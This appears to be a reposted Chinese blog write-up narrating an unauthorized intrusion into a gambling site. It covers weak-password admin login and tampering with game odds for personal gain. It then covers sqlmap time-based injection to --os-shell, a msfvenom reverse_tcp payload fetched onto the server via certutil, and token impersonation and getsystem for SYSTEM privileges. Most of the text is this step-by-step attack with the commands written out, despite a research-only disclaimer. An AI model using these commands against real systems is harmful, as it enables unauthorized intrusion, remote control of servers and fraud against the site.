某棋牌站点注入到提权之路

hs4cky 李白你好 2023-06-22

收录于合集

#非法站点 10 个

#渗透测试 95 个

声明：文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由用户承担全部法律及连带责任，文章作者不承担任何法律及连带责任。

宝子们现在只对常读和星标的公众号才展示大图推送，建议大家把李白你好“设为星标”，否则可能就看不到了啦！20年的老文章了分享一哈。

0x01 前言

在某某附近人发来送￥的邀请截图，在棋牌捕鱼上面把赠送的金额打光之后、随之来做个渗透测试....通过意见反馈打到后台地址以及cookie过期....之后

0x02 开始渗透

开局一个后台

界面挺不错的有点高级高级的感觉，咱先来试试弱口令

咦....直接进去了。随后把账户的胜利调到了百分比

打了一上午鱼之后，金币高达52w

突然感觉好像有点什么不对，，，，咱是来做渗透的不是来捕鱼的吧

渗透棋牌不登陆到服务器界面怎么合适呢

咳咳...继续渗透

后台没有上传点配置文件也不知道路径在哪 ...有点棘手

我们回到登陆框在账户上加个单引号试试看看有没有sqli

嗯哼..点登陆没反应抓包sqlmap一把梭

嗯...很强存在延时注入

我们继续看看是否dba权限

ture看来运气很好啊直接--os-shell

权限有点小啊，，，但问题不大掏出我们的msf

msfvenom -p windows/meterpreter/reverse_tcp lhost="外网ip地址" lport="监听端口" -f exe > msf.exe 生成木马

放置外网方便使我们的目标服务器下载

先在目标服务器创建一个放置木马的文件夹

md c:\test

我们使用certutil.exe进行下载

certutil.exe -urlcache -split -f “木马下载地址” C:\test\test.exe

木马下载成功我们回到msf

设置使用exploit/multi/handler模块

设置payload

show options 看看需要配置的参数

set LHOST “外网ip” //于木马的ip一致set LPORT "端口" //于木马的监听端口一致

随后 run执行

紧接着目标服务器运行木马

成功反弹shell

因为我们的权限太小所以我们现在要先进行提权

使用use incognito来加载会话令牌模块

然后list_tokens -u来列出会话令牌

使用impersonate_token "WIN-IGSV8O3CA7E\Administrator" 盗取 administrator 令牌 getuid查看一下

嘿嘿嘿

最最最后使用getsystem来获取system权限

咳咳接下来就是shell进入

cmd提取命令一把梭

接下来就是快快乐乐的登陆远程服务器了

美滋滋的~~

（然而事情没那么简单~）

咦....

内部出现错误咋回事了....难道远程端口被改了吗。。。。

nmap出动扫描一下端口

没有开放3389 ...... 确定以及肯定是改端口了我们回到shell看看

执行 tasklist /svc

找到svchost.exe进程下termservice服务对应的PID

再执行netstat -ano

根据PID号查找对应远程端口，远程端口为5566端口

嘿~这次能完美手工了吧

Very Good~

0x03 链接获取

文章来源：90sec社区（hs4cky）

原文链接：https://forum.90sec.com/t/topic/945

0x04 往期精彩

如何画出优雅的攻击流程图【攻防复盘必备】

警惕高阶诈骗手法

这样的洞庭湖决堤，实在让人同情不起来

李尚福、魏凤和双双被拿下，与美国一份报告是否有关？

抗洪靠嘴，堵漏靠沙？印度官员真是绝了！

有的人走了，却永远活着

圈内疯传某谣言

某棋牌站点注入到提权之路

声明：文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由用户承担全部法律及连带责任，文章作者不承担任何法律及连带责任。

您可能也对以下帖子感兴趣

这样的洞庭湖决堤，实在让人同情不起来

李尚福、魏凤和双双被拿下，与美国一份报告是否有关？

抗洪靠嘴，堵漏靠沙？印度官员真是绝了！

有的人走了，却永远活着

圈内疯传某谣言

生成图片，分享到微信朋友圈

某棋牌站点注入到提权之路

声明：文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由用户承担全部法律及连带责任，文章作者不承担任何法律及连带责任。

您可能也对以下帖子感兴趣